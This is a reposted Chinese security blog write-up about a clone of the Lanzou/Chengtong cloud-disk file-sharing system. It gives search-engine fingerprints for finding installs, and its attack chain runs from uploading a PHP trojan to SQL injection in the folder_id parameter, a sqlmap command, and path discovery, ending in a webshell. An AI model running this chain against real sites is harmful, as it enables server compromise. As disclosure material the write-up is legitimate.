仿蓝奏网盘(城通)文件上传+sql注入 拿getshell
2024-2-23 14:1:58 Author: www.freebuf.com(查看原文) 阅读量:25 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

这个网盘大家应该都很熟悉 经常逛源码站的朋友都知道,这套源码有很多个名字 仿蓝奏云网盘、城通网盘、闪客网盘系统

二:漏洞影响版本

仿蓝奏网盘

三:网络空间测绘查询

fofa:

"assets/picture/header-mobile.png"

"/assets/static/index/css/share-style.css"

四:漏洞复现

1、前台注册 账号-登录


2、文件上传处,上传php木马

3、通过SQL注入拿到绝对路径 拼接GetShell

folder_id 存在注入   host+/file/list?&folder_id=0&search=&rows=20&page=1

1708667704_65d833381e5d939bd30b3.png!small?17086677038804、sqlmap 一把梭哈(这是一门艺术)

sqlmap.py -r 1.txt -p folder_id --dbs   (1.txt内容为登录后带上cookie的数据包,不知道的渔可以看上一张图片)

sk_stores 数据表

origin_name是我们上传文件的名字

file_name 是 文件在服务器的路径

1708667868_65d833dc3b7d06ade2792.png!small?1708667867897

5、最后在拼接路径访问即可,getshell 访问成功

1708667900_65d833fc8b2f125030492.png!small?1708667901740

注:非原创漏洞,有问题私信解决,复现结束,欢迎佬们指出问题。


文章来源: https://www.freebuf.com/vuls/392397.html
如有侵权请联系:admin#unsafe.sh